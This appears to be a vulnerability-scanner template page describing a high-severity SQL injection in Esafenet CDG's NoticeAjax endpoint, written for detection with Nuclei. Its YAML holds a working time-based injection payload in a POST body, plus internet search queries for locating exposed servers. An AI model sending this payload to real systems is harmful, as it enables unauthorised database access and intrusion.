Esafenet CDG NoticeAjax - Sql Injection

ID: esafenet-noticeajax-sqli

Severity: high

Author: adeljck

Tags: esafenet,sqli

Description

CDGServer3 NoticeAjax Interface Sql Injection.

YAML Source

id: esafenet-noticeajax-sqli

info:
  name: Esafenet CDG NoticeAjax - Sql Injection
  author: adeljck
  severity: high
  description: |
    CDGServer3 NoticeAjax Interface Sql Injection.
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
    hunter-query: web.title="电子文档安全管理系统",web.body="CDGServer3/"
    product: electronic_document_security_management_system
    vendor: esafenet
  tags: esafenet,sqli

http:
  - raw:
      - |
        @timeout: 10s
        POST /CDGServer3/NoticeAjax;Service HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Content-Type: application/x-www-form-urlencoded

        command=delNotice&noticeId=123';if+(select+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'--

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"text/xml")'
          - 'contains(body,"OK")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100c91d4aab0aefc38b0e9a363e519874524992e1fdc2b7cb397388fa01f218414a02210091243d6e2c6d5ab838dbeddf05a3cd34c6a145fa85f26ba859b90dc35e8e1db8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml"

View on Github